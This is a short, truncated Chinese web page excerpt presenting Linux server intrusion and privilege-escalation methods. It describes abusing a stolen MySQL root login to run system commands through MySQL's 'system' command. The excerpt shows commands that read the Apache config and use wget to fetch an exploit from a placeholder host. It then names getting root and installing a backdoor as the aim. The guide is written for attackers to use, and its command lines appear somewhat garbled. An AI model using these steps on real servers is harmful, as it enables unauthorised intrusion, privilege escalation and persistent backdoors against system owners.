首页 相关文章 linux入侵提权(服务器提权)方法

linux入侵提权(服务器提权)方法

linux入侵提权(服务器提权)方法

  利用mysql root提权方法

  mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。

  一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如斯这般。今天我们换一种方式。

  按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行

  mysqlsystem vi /etc/httpd/conf/httpd.conf;

  直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,好比,下载exp执行, 搞到 root权限,然后装后门

  mysqlsystem wget http://www.xxx.com/xxxx ;

 ...[ 查看全文 ]

2016-03-31 标签:

linux入侵提权(服务器提权)方法的相关文章

手机页面
收藏网站 回到头部